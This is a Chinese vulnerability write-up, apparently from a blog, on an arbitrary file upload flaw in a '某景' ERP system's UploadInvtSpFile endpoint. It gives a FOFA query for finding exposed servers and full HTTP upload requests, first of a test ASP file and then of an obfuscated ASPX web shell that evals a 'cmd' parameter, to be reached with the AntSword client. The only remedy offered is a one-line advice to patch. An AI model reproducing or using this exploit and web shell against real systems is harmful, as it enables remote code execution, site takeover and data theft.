0x01 漏洞描述:
某景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。
0x02 搜索语句:
FOFA:body="/api/DBRecord/getDBRecords"
0x03 漏洞复现:
POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=-----------------1111
Content-Length: 178
-------------------1111
Content-Disposition: form-data; name="filedata"; filename="2142142142.asp"
Content-Type: image/png
<% response.write("helloWorld")%>
-------------------1111-- 
拼接响应路径访问
http://your-ip/InvtSpFiles/4f6d2ed2-57c5-44e1-9090-1317c2023761.asp
GetShell
POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=-----------------1111
Content-Length: 178
-------------------1111
Content-Disposition: form-data; name="filedata"; filename="2142142142.aspx"
Content-Type: image/png
<% function EfmB6149(){var GEPH="unsa",YACK="fe",C6E1=GEPH+YACK;return C6E1;}var PAY:String=Request["cmd"];~eval/*Zd0216312v*/(PAY,EfmB6149());%><%@Page Language = JS%>
-------------------1111-- 
蚁剑连接
0x04 修复建议:
厂商已发布补丁 请即时修复
标签:1111,ERP,form,data,-------------------,Content,Type,某景,UploadInvtSpFile From: https://blog.csdn.net/xc_214/article/details/142252506